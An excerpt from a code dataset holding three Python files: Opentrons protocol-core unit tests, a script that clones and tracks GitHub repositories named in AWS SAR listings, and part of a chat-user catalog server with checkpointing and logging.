test_get_slot_item_empty(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return None for an empty deck slot.\"\"\"\n decoy.when(\n mock_engine_client.state.geometry.get_slot_item(\n slot_name=DeckSlotName.SLOT_1,\n allowed_labware_ids={\"fixed-trash-123\"},\n allowed_module_ids=set(),\n )\n ).then_return(None)\n\n assert subject.get_slot_item(DeckSlotName.SLOT_1) is None\n\n\ndef test_load_instrument(\n decoy: Decoy,\n mock_sync_hardware_api: SyncHardwareAPI,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a LoadPipette command.\"\"\"\n decoy.when(\n mock_engine_client.load_pipette(\n pipette_name=PipetteNameType.P300_SINGLE, mount=MountType.LEFT\n )\n ).then_return(commands.LoadPipetteResult(pipetteId=\"cool-pipette\"))\n\n decoy.when(\n mock_engine_client.state.pipettes.get_flow_rates(\"cool-pipette\")\n ).then_return(\n FlowRates(\n default_aspirate={\"1.1\": 22},\n default_dispense={\"3.3\": 44},\n default_blow_out={\"5.5\": 66},\n ),\n )\n\n result = subject.load_instrument(\n instrument_name=PipetteNameType.P300_SINGLE, mount=Mount.LEFT\n )\n\n assert isinstance(result, InstrumentCore)\n assert result.pipette_id == \"cool-pipette\"\n\n\ndef test_load_labware(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a LoadLabware command.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.find_custom_labware_load_params()\n ).then_return([EngineLabwareLoadParams(\"hello\", \"world\", 654)])\n\n decoy.when(\n load_labware_params.resolve(\n \"some_labware\",\n \"a_namespace\",\n 456,\n [EngineLabwareLoadParams(\"hello\", \"world\", 654)],\n )\n ).then_return((\"some_namespace\", 9001))\n\n decoy.when(\n mock_engine_client.load_labware(\n location=DeckSlotLocation(slotName=DeckSlotName.SLOT_5),\n load_name=\"some_labware\",\n display_name=\"some_display_name\",\n namespace=\"some_namespace\",\n version=9001,\n )\n ).then_return(\n commands.LoadLabwareResult(\n labwareId=\"abc123\",\n definition=LabwareDefinition.construct(), # type: ignore[call-arg]\n offsetId=None,\n )\n )\n\n decoy.when(mock_engine_client.state.labware.get_definition(\"abc123\")).then_return(\n LabwareDefinition.construct(ordering=[]) # type: ignore[call-arg]\n )\n\n result = subject.load_labware(\n load_name=\"some_labware\",\n location=DeckSlotName.SLOT_5,\n label=\"some_display_name\", # maps to optional display name\n namespace=\"a_namespace\",\n version=456,\n )\n\n assert isinstance(result, LabwareCore)\n assert result.labware_id == \"abc123\"\n assert subject.get_labware_cores() == [subject.fixed_trash, result]\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_labware_id=\"abc123\",\n )\n )\n\n decoy.when(\n mock_engine_client.state.geometry.get_slot_item(\n slot_name=DeckSlotName.SLOT_5,\n allowed_labware_ids={\"fixed-trash-123\", \"abc123\"},\n allowed_module_ids=set(),\n )\n ).then_return(\n LoadedLabware.construct(id=\"abc123\") # type: ignore[call-arg]\n )\n\n assert subject.get_slot_item(DeckSlotName.SLOT_5) is result\n\n\n@pytest.mark.parametrize(\n argnames=[\"use_gripper\", \"expected_strategy\"],\n argvalues=[\n (True, LabwareMovementStrategy.USING_GRIPPER),\n (False, LabwareMovementStrategy.MANUAL_MOVE_WITH_PAUSE),\n ],\n)\n@pytest.mark.parametrize(\n argnames=[\n \"use_pick_up_location_lpc_offset\",\n \"use_drop_location_lpc_offset\",\n \"pick_up_offset\",\n \"drop_offset\",\n ],\n argvalues=[\n (False, False, None, None),\n (True, False, None, None),\n (False, True, None, (4, 5, 6)),\n (True, True, (4, 5, 6), (4, 5, 6)),\n ],\n)\ndef test_move_labware(\n decoy: Decoy,\n subject: ProtocolCore,\n mock_engine_client: EngineClient,\n expected_strategy: LabwareMovementStrategy,\n use_gripper: bool,\n use_pick_up_location_lpc_offset: bool,\n use_drop_location_lpc_offset: bool,\n pick_up_offset: Optional[Tuple[float, float, float]],\n drop_offset: Optional[Tuple[float, float, float]],\n) -> None:\n \"\"\"It should issue a move labware command to the engine.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.get_definition(\"labware-id\")\n ).then_return(\n LabwareDefinition.construct(ordering=[]) # type: ignore[call-arg]\n )\n labware = LabwareCore(labware_id=\"labware-id\", engine_client=mock_engine_client)\n subject.move_labware(\n labware_core=labware,\n new_location=DeckSlotName.SLOT_5,\n use_gripper=use_gripper,\n use_pick_up_location_lpc_offset=use_pick_up_location_lpc_offset,\n use_drop_location_lpc_offset=use_drop_location_lpc_offset,\n pick_up_offset=pick_up_offset,\n drop_offset=drop_offset,\n )\n decoy.verify(\n mock_engine_client.move_labware(\n labware_id=\"labware-id\",\n new_location=DeckSlotLocation(slotName=DeckSlotName.SLOT_5),\n strategy=expected_strategy,\n use_pick_up_location_lpc_offset=use_pick_up_location_lpc_offset,\n use_drop_location_lpc_offset=use_drop_location_lpc_offset,\n pick_up_offset=LabwareOffsetVector(x=4, y=5, z=6)\n if pick_up_offset\n else None,\n drop_offset=LabwareOffsetVector(x=4, y=5, z=6) if drop_offset else None,\n )\n )\n\n\n@pytest.mark.parametrize(\"api_version\", [APIVersion(2, 3)])\ndef test_load_labware_on_module(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n mock_sync_module_hardware: SynchronousAdapter[AbstractModule],\n subject: ProtocolCore,\n api_version: APIVersion,\n) -> None:\n \"\"\"It should issue a LoadLabware command.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.find_custom_labware_load_params()\n ).then_return([EngineLabwareLoadParams(\"hello\", \"world\", 654)])\n\n decoy.when(\n load_labware_params.resolve(\n \"some_labware\",\n \"a_namespace\",\n 456,\n [EngineLabwareLoadParams(\"hello\", \"world\", 654)],\n )\n ).then_return((\"some_namespace\", 9001))\n\n decoy.when(\n mock_engine_client.load_labware(\n location=ModuleLocation(moduleId=\"module-id\"),\n load_name=\"some_labware\",\n display_name=\"some_display_name\",\n namespace=\"some_namespace\",\n version=9001,\n )\n ).then_return(\n commands.LoadLabwareResult(\n labwareId=\"abc123\",\n definition=LabwareDefinition.construct(), # type: ignore[call-arg]\n offsetId=None,\n )\n )\n\n decoy.when(mock_engine_client.state.labware.get_definition(\"abc123\")).then_return(\n LabwareDefinition.construct(ordering=[]) # type: ignore[call-arg]\n )\n\n module_core = ModuleCore(\n module_id=\"module-id\",\n engine_client=mock_engine_client,\n api_version=api_version,\n sync_module_hardware=mock_sync_module_hardware,\n )\n\n result = subject.load_labware(\n load_name=\"some_labware\",\n location=module_core,\n label=\"some_display_name\", # maps to optional display name\n namespace=\"a_namespace\",\n version=456,\n )\n\n assert isinstance(result, LabwareCore)\n assert result.labware_id == \"abc123\"\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_labware_id=\"abc123\",\n )\n )\n\n decoy.when(\n mock_engine_client.state.labware.get_id_by_module(\"module-id\")\n ).then_return(\"abc123\")\n\n assert subject.get_labware_on_module(module_core) is result\n\n\ndef test_add_labware_definition(\n decoy: Decoy,\n minimal_labware_def: LabwareDefDict,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should add a labware definition to the engine.\"\"\"\n decoy.when(\n mock_engine_client.add_labware_definition(\n definition=LabwareDefinition.parse_obj(minimal_labware_def)\n )\n ).then_return(LabwareUri(\"hello/world/123\"))\n\n result = subject.add_labware_definition(minimal_labware_def)\n\n assert result == LabwareLoadParams(\"hello\", \"world\", 123)\n\n\n# TODO(mc, 2022-10-25): move to module core factory function\n@pytest.mark.parametrize(\n (\"requested_model\", \"engine_model\", \"expected_core_cls\"),\n [\n (\n TemperatureModuleModel.TEMPERATURE_V1,\n EngineModuleModel.TEMPERATURE_MODULE_V1,\n TemperatureModuleCore,\n ),\n (\n TemperatureModuleModel.TEMPERATURE_V2,\n EngineModuleModel.TEMPERATURE_MODULE_V2,\n TemperatureModuleCore,\n ),\n (\n MagneticModuleModel.MAGNETIC_V1,\n EngineModuleModel.MAGNETIC_MODULE_V1,\n MagneticModuleCore,\n ),\n (\n MagneticModuleModel.MAGNETIC_V2,\n EngineModuleModel.MAGNETIC_MODULE_V2,\n MagneticModuleCore,\n ),\n (\n ThermocyclerModuleModel.THERMOCYCLER_V1,\n EngineModuleModel.THERMOCYCLER_MODULE_V1,\n ThermocyclerModuleCore,\n ),\n (\n ThermocyclerModuleModel.THERMOCYCLER_V2,\n EngineModuleModel.THERMOCYCLER_MODULE_V2,\n ThermocyclerModuleCore,\n ),\n (\n HeaterShakerModuleModel.HEATER_SHAKER_V1,\n EngineModuleModel.HEATER_SHAKER_MODULE_V1,\n HeaterShakerModuleCore,\n ),\n ],\n)\ndef test_load_module(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n mock_sync_hardware_api: SyncHardwareAPI,\n requested_model: ModuleModel,\n engine_model: EngineModuleModel,\n expected_core_cls: Type[ModuleCore],\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a load module engine command.\"\"\"\n definition = ModuleDefinition.construct() # type: ignore[call-arg]\n\n mock_hw_mod_1 = decoy.mock(cls=AbstractModule)\n mock_hw_mod_2 = decoy.mock(cls=AbstractModule)\n\n decoy.when(mock_hw_mod_1.device_info).then_return({\"serial\": \"abc123\"})\n decoy.when(mock_hw_mod_2.device_info).then_return({\"serial\": \"xyz789\"})\n decoy.when(mock_sync_hardware_api.attached_modules).then_return(\n [mock_hw_mod_1, mock_hw_mod_2]\n )\n\n decoy.when(\n mock_engine_client.load_module(\n model=engine_model,\n location=DeckSlotLocation(slotName=DeckSlotName.SLOT_1),\n )\n ).then_return(\n commands.LoadModuleResult(\n moduleId=\"abc123\",\n definition=definition,\n model=engine_model,\n serialNumber=\"xyz789\",\n )\n )\n\n result = subject.load_module(\n model=requested_model,\n deck_slot=DeckSlotName.SLOT_1,\n configuration=None,\n )\n\n assert isinstance(result, expected_core_cls)\n assert result.module_id == \"abc123\"\n assert subject.get_module_cores() == [result]\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_module_id=\"abc123\",\n )\n )\n\n decoy.when(\n mock_engine_client.state.geometry.get_slot_item(\n slot_name=DeckSlotName.SLOT_1,\n allowed_labware_ids={\"fixed-trash-123\"},\n allowed_module_ids={\"abc123\"},\n )\n ).then_return(\n LoadedModule.construct(id=\"abc123\") # type: ignore[call-arg]\n )\n decoy.when(mock_engine_client.state.labware.get_id_by_module(\"abc123\")).then_raise(\n LabwareNotLoadedOnModuleError(\"oh no\")\n )\n\n assert subject.get_slot_item(DeckSlotName.SLOT_1) is result\n assert subject.get_labware_on_module(result) is None\n\n\n@pytest.mark.parametrize(\n (\"requested_model\", \"engine_model\"),\n [\n (\n ThermocyclerModuleModel.THERMOCYCLER_V1,\n EngineModuleModel.THERMOCYCLER_MODULE_V1,\n ),\n (\n ThermocyclerModuleModel.THERMOCYCLER_V2,\n EngineModuleModel.THERMOCYCLER_MODULE_V2,\n ),\n ],\n)\ndef test_load_module_thermocycler_with_no_location(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n mock_sync_hardware_api: SyncHardwareAPI,\n requested_model: ModuleModel,\n engine_model: EngineModuleModel,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a load module engine command with location at 7.\"\"\"\n definition = ModuleDefinition.construct() # type: ignore[call-arg]\n\n mock_hw_mod = decoy.mock(cls=AbstractModule)\n decoy.when(mock_hw_mod.device_info).then_return({\"serial\": \"xyz789\"})\n decoy.when(mock_sync_hardware_api.attached_modules).then_return([mock_hw_mod])\n\n decoy.when(\n mock_engine_client.load_module(\n model=engine_model,\n location=DeckSlotLocation(slotName=DeckSlotName.SLOT_7),\n )\n ).then_return(\n commands.LoadModuleResult(\n moduleId=\"abc123\",\n definition=definition,\n model=engine_model,\n serialNumber=\"xyz789\",\n )\n )\n\n result = subject.load_module(\n model=requested_model,\n deck_slot=None,\n configuration=None,\n )\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_module_id=\"abc123\",\n )\n )\n\n assert isinstance(result, ThermocyclerModuleCore)\n assert result.module_id == \"abc123\"\n\n\n@pytest.mark.parametrize(\n \"requested_model\",\n [\n HeaterShakerModuleModel.HEATER_SHAKER_V1,\n MagneticModuleModel.MAGNETIC_V1,\n MagneticModuleModel.MAGNETIC_V2,\n TemperatureModuleModel.TEMPERATURE_V1,\n TemperatureModuleModel.TEMPERATURE_V2,\n ],\n)\ndef test_load_module_no_location(\n requested_model: ModuleModel, subject: ProtocolCore\n) -> None:\n \"\"\"Should raise an InvalidModuleLocationError exception.\"\"\"\n with pytest.raises(InvalidModuleLocationError):\n subject.load_module(model=requested_model, deck_slot=None, configuration=None)\n\n\n@pytest.mark.parametrize(\"message\", [None, \"Hello, world!\", \"\"])\ndef test_pause(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n message: Optional[str],\n) -> None:\n \"\"\"It should issue a waitForResume command.\"\"\"\n subject.pause(msg=message)\n decoy.verify(mock_engine_client.wait_for_resume(message=message))\n\n\n@pytest.mark.parametrize(\"seconds\", [0.0, -1.23, 1.23])\n@pytest.mark.parametrize(\"message\", [None, \"Hello, world!\", \"\"])\ndef test_delay(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n seconds: float,\n message: Optional[str],\n) -> None:\n \"\"\"It should issue a waitForDuration command.\"\"\"\n subject.delay(seconds=seconds, msg=message)\n decoy.verify(mock_engine_client.wait_for_duration(seconds=seconds, message=message))\n\n\ndef test_comment(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a comment command.\"\"\"\n subject.comment(\"Hello, world!\")\n decoy.verify(mock_engine_client.comment(\"Hello, world!\"))\n\n\ndef test_home(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should home all axes.\"\"\"\n subject.home()\n decoy.verify(mock_engine_client.home(axes=None), times=1)\n\n\ndef test_is_simulating(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should return if simulating.\"\"\"\n decoy.when(mock_engine_client.state.config.ignore_pause).then_return(True)\n assert subject.is_simulating()\n\n\ndef test_set_rail_lights(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should verify a call to sync client.\"\"\"\n subject.set_rail_lights(on=True)\n decoy.verify(mock_engine_client.set_rail_lights(on=True))\n\n subject.set_rail_lights(on=False)\n decoy.verify(mock_engine_client.set_rail_lights(on=False))\n\n\ndef test_get_rail_lights(\n decoy: Decoy, mock_sync_hardware_api: SyncHardwareAPI, subject: ProtocolCore\n) -> None:\n \"\"\"It should get rails light state.\"\"\"\n decoy.when(mock_sync_hardware_api.get_lights()).then_return({\"rails\": True})\n\n result = subject.get_rail_lights_on()\n assert result is True\n\n\ndef test_get_deck_definition(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return the loaded deck definition from engine state.\"\"\"\n deck_definition = cast(DeckDefinitionV3, {\"schemaVersion\": \"3\"})\n\n decoy.when(mock_engine_client.state.labware.get_deck_definition()).then_return(\n deck_definition\n )\n\n result = subject.get_deck_definition()\n\n assert result == deck_definition\n\n\ndef test_get_slot_center(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return a slot center from engine state.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.get_slot_center_position(DeckSlotName.SLOT_2)\n ).then_return(Point(1, 2, 3))\n\n result = subject.get_slot_center(DeckSlotName.SLOT_2)\n\n assert result == Point(1, 2, 3)\n\n\ndef test_get_highest_z(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return a slot center from engine state.\"\"\"\n decoy.when(\n mock_engine_client.state.geometry.get_all_labware_highest_z()\n ).then_return(9001)\n\n result = subject.get_highest_z()\n\n assert result == 9001\n\n\ndef test_add_liquid(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should return the created liquid.\"\"\"\n liquid = PE_Liquid.construct(\n id=\"water-id\",\n displayName=\"water\",\n description=\"water desc\",\n displayColor=HexColor(__root__=\"#fff\"),\n )\n\n expected_result = Liquid(\n _id=\"water-id\",\n name=\"water\",\n description=\"water desc\",\n display_color=\"#fff\",\n )\n\n decoy.when(\n mock_engine_client.add_liquid(\n name=\"water\", color=\"#fff\", description=\"water desc\"\n )\n ).then_return(liquid)\n\n result = subject.define_liquid(\n name=\"water\", description=\"water desc\", display_color=\"#fff\"\n )\n\n assert result == expected_result\n","repo_name":"busing/opentrons","sub_path":"api/tests/opentrons/protocol_api/core/engine/test_protocol_core.py","file_name":"test_protocol_core.py","file_ext":"py","file_size_in_byte":23740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"26340279323","text":"import pandas as pd\nimport glob\nimport sys\nimport os\nimport json\nimport subprocess\nimport time\n\ndef codechecker(filename, tmpdir, pullcode=True, verbose=True):\n\tdf = pd.read_csv(filename, names=[\"id\", \"fqid\", \"vendor\", \"deployments\", \"tags\", \"description\", \"url\", \"caps\"])\n\n\turllist = list(df[\"url\"])\n\tnamelist = list(df[\"id\"])\n\thascloned = {}\n\thasclonednow = {}\n\tfolders = {}\n\tnamedfolders = {}\n\tneedscopy = {}\n\tneedscopyurl = {}\n\tsuccess = 0\n\tfailure = 0\n\tunpulled = 0\n\tdupe = 0\n\totherurls = {}\n\tnourls = 0\n\tstatsnew = 0\n\tstatsupdated = 0\n\tprevtime = 0\n\n\tif pullcode:\n\t\tif os.path.isfile(\"codecheckerrepos.json\"):\n\t\t\tf = open(\"codecheckerrepos.json\")\n\t\t\thascloned = json.load(f)\n\t\tif os.path.isfile(\"codecheckerfolders.json\"):\n\t\t\tf = open(\"codecheckerfolders.json\")\n\t\t\tfolders = json.load(f)\n\t\tif os.path.isfile(\"codecheckernamedfolders.json\"):\n\t\t\tf = open(\"codecheckernamedfolders.json\")\n\t\t\tnamedfolders = json.load(f)\n\t\tif os.path.isfile(\"_codestamp\"):\n\t\t\tf = open(\"_codestamp\")\n\t\t\tprevtime = int(f.read().strip())\n\t\t\tprint(\"last run {}s ago\".format(int(time.time()) - prevtime))\n\t\tf = open(\"_codestamp\", \"w\")\n\t\tprint(str(int(time.time())), file=f)\n\t\tf.close()\n\n\tfor i, urlname in enumerate(zip(urllist, namelist)):\n\t\turl, name = urlname\n\t\tipos = len(hascloned) + 1\n\t\tif \"github.com\" in str(url):\n\t\t\turlstem = \"/\".join(url.split(\"/\")[:5])\n\t\t\turlpath = \"/\".join(url.split(\"/\")[5:])\n\t\t\tif urlstem in hasclonednow:\n\t\t\t\tipos = hasclonednow[urlstem]\n\t\t\t\tprint(\"REPO reuse {} ({})\".format(urlstem, ipos))\n\t\t\t\tdupe += 1\n\t\t\telif pullcode:\n\t\t\t\tif urlstem in hascloned:\n\t\t\t\t\tipos = hascloned[urlstem]\n\t\t\t\tif os.path.isdir(\"{}/_codechecker/{}\".format(tmpdir, ipos)):\n\t\t\t\t\tprint(\"REPO clone-update {}... ({})\".format(urlstem, ipos))\n\t\t\t\t\tif time.time() - prevtime > 3600:\n\t\t\t\t\t\torigdir = os.getcwd()\n\t\t\t\t\t\tos.chdir(\"{}/_codechecker/{}\".format(tmpdir, ipos))\n\t\t\t\t\t\tos.system(\"git -c core.askpass=true fetch -q\")\n\t\t\t\t\t\tp = subprocess.run(\"git diff origin/HEAD\", shell=True, stdout=subprocess.PIPE)\n\t\t\t\t\t\tif p.stdout:\n\t\t\t\t\t\t\tstatsupdated += 1\n\t\t\t\t\t\t\tos.system(\"git merge origin/HEAD\")\n\t\t\t\t\t\t\tneedscopy[urlstem] = True\n\t\t\t\t\t\tos.chdir(origdir)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\" (skip actual update check due to short succession)\")\n\t\t\t\t\thascloned[urlstem] = ipos\n\t\t\t\t\thasclonednow[urlstem] = ipos\n\t\t\t\t\tsuccess += 1\n\t\t\t\telse:\n\t\t\t\t\tprint(\"REPO clone {}... ({})\".format(urlstem, ipos))\n\t\t\t\t\tos.makedirs(\"{}/_codechecker\".format(tmpdir), exist_ok=True)\n\t\t\t\t\tret = os.system(\"git -c core.askpass=true clone -q {} {}/_codechecker/{}\".format(urlstem, tmpdir, ipos))\n\t\t\t\t\tif ret:\n\t\t\t\t\t\tprint(\"!!!! ERROR cloning\")\n\t\t\t\t\t\tfailure += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsuccess += 1\n\t\t\t\t\t\thascloned[urlstem] = ipos\n\t\t\t\t\t\thasclonednow[urlstem] = ipos\n\t\t\t\t\t\tneedscopy[urlstem] = True\n\t\t\t\t\t\tstatsnew += 1\n\t\t\telse:\n\t\t\t\tunpulled += 1\n\t\t\t\thascloned[urlstem] = ipos\n\t\t\t\thasclonednow[urlstem] = ipos\n\n\t\t\tif not url in folders:\n\t\t\t\tfolders[url] = str(ipos) + \"-\" + str(len(folders) + 1)\n\t\t\tif not name in namedfolders:\n\t\t\t\tnamedfolders[name] = folders[url]\n\t\t\tif pullcode:\n\t\t\t\tfpos = folders[url]\n\t\t\t\tif not os.path.isdir(\"{}/_codefolders/{}\".format(tmpdir, fpos)):\n\t\t\t\t\tneedscopy[urlstem] = True\n\t\t\t\t\tif url in needscopyurl:\n\t\t\t\t\t\tdel needscopyurl[url]\n\t\t\t\tif urlstem in needscopy and needscopy[urlstem] and not url in needscopyurl:\n\t\t\t\t\tneedscopyurl[url] = False\n\t\t\t\t\tprint(\" DIR produce folder {}\".format(fpos))\n\t\t\t\t\tos.makedirs(\"{}/_codefolders\".format(tmpdir), exist_ok=True)\n\t\t\t\t\torigdir = None\n\t\t\t\t\tif urlpath.startswith(\"tree\"):\n\t\t\t\t\t\ttree, treename, *rest = urlpath.split(\"/\")\n\t\t\t\t\t\turlpath = \"/\".join(rest)\n\t\t\t\t\t\torigdir = os.getcwd()\n\t\t\t\t\t\tos.chdir(\"{}/_codechecker/{}\".format(tmpdir, hascloned[urlstem]))\n\t\t\t\t\t\tos.system(\"git checkout -q {}\".format(treename))\n\t\t\t\t\t\tos.chdir(origdir)\n\t\t\t\t\tos.system(\"rm -rf {}/_codefolders/{}\".format(tmpdir, fpos))\n\t\t\t\t\tos.system(\"cp -r {}/_codechecker/{}/{} {}/_codefolders/{}\".format(tmpdir, hascloned[urlstem], urlpath, tmpdir, fpos))\n\t\t\t\t\tos.system(\"rm -rf {}/_codefolders/{}/.git\".format(tmpdir, fpos))\n\t\t\t\telse:\n\t\t\t\t\tprint(\" DIR reuse existing folder {}\".format(fpos))\n\t\t\t#if origdir:\n\t\t\t#\tos.chdir(\"_codechecker/{}\".format(hascloned[urlstem]))\n\t\t\t#\tos.system(\"git checkout master\") # origin/HEAD?\n\t\t\t#\tos.chdir(origdir)\n\t\telse:\n\t\t\tif pd.isnull(url):\n\t\t\t\tnourls += 1\n\t\t\telse:\n\t\t\t\turlstem = url\n\t\t\t\tif \"/\" in url:\n\t\t\t\t\turlstem = url.split(\"/\")[2]\n\t\t\t\totherurls[urlstem] = otherurls.get(urlstem, 0) + 1\n\n\tif pullcode:\n\t\tf = open(\"codecheckerrepos.json\", \"w\")\n\t\tjson.dump(hascloned, f, sort_keys=True)\n\t\tf.close()\n\t\tf = open(\"codecheckerfolders.json\", \"w\")\n\t\tjson.dump(folders, f, sort_keys=True)\n\t\tf.close()\n\t\tf = open(\"codecheckernamedfolders.json\", \"w\")\n\t\tjson.dump(namedfolders, f, sort_keys=True)\n\t\tf.close()\n\n\tprint(\"failures {} + success {} = unique github repos {} + dupes {} = github {} + other {} + none {} = total {}\".format(failure, success, failure + success + unpulled, dupe, failure + success + unpulled + dupe, len(urllist) - failure - success - unpulled - dupe - nourls, nourls, len(urllist)))\n\tprint(\"others\", otherurls)\n\n\tif pullcode:\n\t\tprint(\"stats: new {}, updated {}\".format(statsnew, statsupdated))\n\n\t\tif os.path.isfile(\"codecheckerstats.csv\"):\n\t\t\tf = open(\"codecheckerstats.csv\", \"a\")\n\t\telse:\n\t\t\tf = open(\"codecheckerstats.csv\", \"w\")\n\t\t\tprint(\"#date,new,updated\", file=f)\n\t\tdate = filename.replace(\"autostats/\", \"\").replace(\"autocontents-\", \"\").replace(\".csv\", \"\")\n\t\tprint(\"{},{},{}\".format(date, statsnew, statsupdated), file=f)\n\t\tf.close()\n\n\treturn len(urllist), failure, success, unpulled, dupe, nourls\n\ntmpdir = \".\"\nstats = False\nif len(sys.argv) == 2:\n\ttmpdir = sys.argv[1]\n\tif sys.argv[1] == \"--stats\":\n\t\tstats = True\n\nif not os.path.isdir(\"autostats\"):\n\tprint(\"Error: must be run in the parent directory of 'autostats'.\", file=sys.stderr)\n\tsys.exit(-1)\n\nfilenames = glob.glob(\"autostats/autocontents-*.csv\")\nfilenames.sort()\n\nif not stats:\n\tfilename = filenames[-1]\n\ttotal, failure, success, unpulled, dupe, nourls = codechecker(filename, tmpdir)\n\n\tadd = False\n\tif not os.path.isfile(\"codecheckerpull.csv\"):\n\t\tadd = True\n\n\tf = open(\"codecheckerpull.csv\", \"a\")\n\tif add:\n\t\tprint(\"#date,total,failure,success,github-unique,github-dupe,other,none\", file=f)\n\tdate = filename.replace(\"autostats/\", \"\").replace(\"autocontents-\", \"\").replace(\".csv\", \"\")\n\tother = total - failure - success - unpulled - dupe - nourls\n\tprint(\"{},{},{},{},{},{},{},{}\".format(date, total, failure, success, failure + success + unpulled, failure + success + unpulled + dupe, other, nourls), file=f)\n\tf.close()\nelse:\n\tf = open(\"codechecker.csv\", \"w\")\n\tprint(\"#date,total,github-unique,github-dupe,other,none\", file=f)\n\tfor filename in filenames:\n\t\tdate = filename.replace(\"autostats/\", \"\").replace(\"autocontents-\", \"\").replace(\".csv\", \"\")\n\t\ttotal, fign, sign, unpulled, dupe, nourls = codechecker(filename, None, False)\n\t\tother = total - unpulled - dupe - nourls\n\t\tprint(\"{},{},{},{},{},{}\".format(date, total, unpulled, dupe, other, nourls), file=f)\n\tf.close()\n","repo_name":"serviceprototypinglab/aws-sar-analysis","sub_path":"codechecker.py","file_name":"codechecker.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"277899739","text":"import socket\nimport time\nimport os\nimport json\nfrom select import select\nfrom protocols import *\n\n# path to checkpoint and log files\nCKPT = 'catalog.ckpt'\nLOG = 'catalog.log'\n# maximum number of logs before checkpoint\nMAX_LOGS = 100\n\n# maximum message size to reach each time in bytes\nMSG_SIZE = 1024\n\n\nclass Catalog:\n '''Catalog of registered users. Implemented as a dictionary of dictionaries.'''\n def __init__(self):\n self._catalog = dict()\n\n def add(self, name, address, status, verbose=True, isgroup= False):\n # Add a new user to the catalog or update an existing user's information\n # address is a tuple of (host, port)\n self._catalog[name] = {\n 'address': address,\n 'status': status,\n 'last_update': time.time(),\n 'isgroup': False,\n }\n if isgroup:\n self._catalog[name]['isgroup'] = True\n if verbose:\n host, port = address\n print(\"Registered user {} at {}:{} as {}\".format(name, host, port, status))\n\n def lookup(self, name):\n # Lookup a user's information\n # return the user's dictionary, or None if not found\n return self._catalog.get(name, None)\n \n def items(self):\n # Return an iterator of (name, user) pairs\n return self._catalog.items()\n \n def update_stale(self, verbose=True):\n # Update status of stale users to 'offline' if they haven't been updated in 120 seconds\n ts = time.time()\n updated = []\n for name, user in self._catalog.items():\n if user['isgroup']:\n continue\n if ts - user['last_update'] > 120.0 and user['status'] == 'online':\n self._catalog[name][\"status\"] = 'offline'\n if verbose:\n print(\"Updated stale user {} as offline\".format(name))\n updated.append((name, user['address'], user['status']))\n return updated\n\nclass Checkpoint:\n '''Checkpoint class for periodically saving catalog to disk.'''\n def __init__(self, path):\n self.path = path\n\n def save(self, catalog: Catalog, ts: float):\n # Save catalog to disk by shadowing\n with open(self.path+'.tmp', 'w') as f:\n f.write(str(ts)+'\\n')\n for name, user in catalog.items():\n if isinstance(user['address'], list) or isinstance(user['address'], tuple):\n user['address'] = ' '.join(map(str, user['address']))\n f.write(' '.join([name, user['address'], user['status']])+'\\n')\n f.flush()\n os.sync()\n os.rename(self.path+'.tmp', self.path)\n \n def load(self):\n # Load catalog from disk, returns a catalog object and timestamp\n catalog = Catalog()\n try:\n with open(self.path, 'r') as f:\n ts = float(f.readline().strip())\n for line in f.read().splitlines():\n name, host, port, status = line.split()\n catalog.add(name, (host,port), status, verbose=False)\n except FileNotFoundError:\n ts = 0.0\n return catalog, ts\n\nclass Log:\n '''Log class for recording updates'''\n def __init__(self, path):\n self.path = path\n try:\n self.log = open(self.path, 'r+')\n except FileNotFoundError:\n with open(self.path, 'w+') as f:\n f.write('0.0\\n')\n f.flush()\n os.fsync(f.fileno())\n self.log = open(self.path, 'r+')\n self.length = 0\n \n def playback(self, catalog: Catalog, ckpt_ts: float):\n # playback log file, update catalog, and skip incomplete logs\n # if log is stale, truncate it and return the original catalog\n # else, return new catalog updated with log\n log_ts = float(self.log.readline().strip())\n if log_ts < ckpt_ts:\n # log is stale, truncate 